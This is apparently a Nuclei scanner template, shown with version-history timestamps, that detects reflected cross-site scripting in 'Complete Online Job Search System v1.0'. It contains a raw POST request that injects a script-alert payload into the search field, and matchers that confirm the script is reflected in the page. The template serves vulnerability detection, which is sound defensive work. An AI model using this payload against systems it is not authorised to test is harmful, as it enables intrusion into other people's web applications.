nuclei-templates/vulnerabilities/other/eris-xss.yaml

39 lines
946 B
YAML
Raw Normal View History

2022-07-18 12:44:09 +00:00
id: eris-xss
info:
name: Complete Online Job Search System v1.0 - Cross-Site Scripting
2022-07-18 12:44:09 +00:00
author: arafatansari
severity: medium
description: |
Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch.
2022-07-19 08:55:14 +00:00
metadata:
verified: true
tags: cve,cve2022,xss,eris
2022-07-18 12:44:09 +00:00
requests:
- raw:
- |
POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-19 08:55:14 +00:00
SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit
2022-07-18 12:44:09 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-19 08:55:14 +00:00
- 'Result : <script>alert(document.domain)</script>'
- 'ERIS'
condition: and
2022-07-18 12:44:09 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200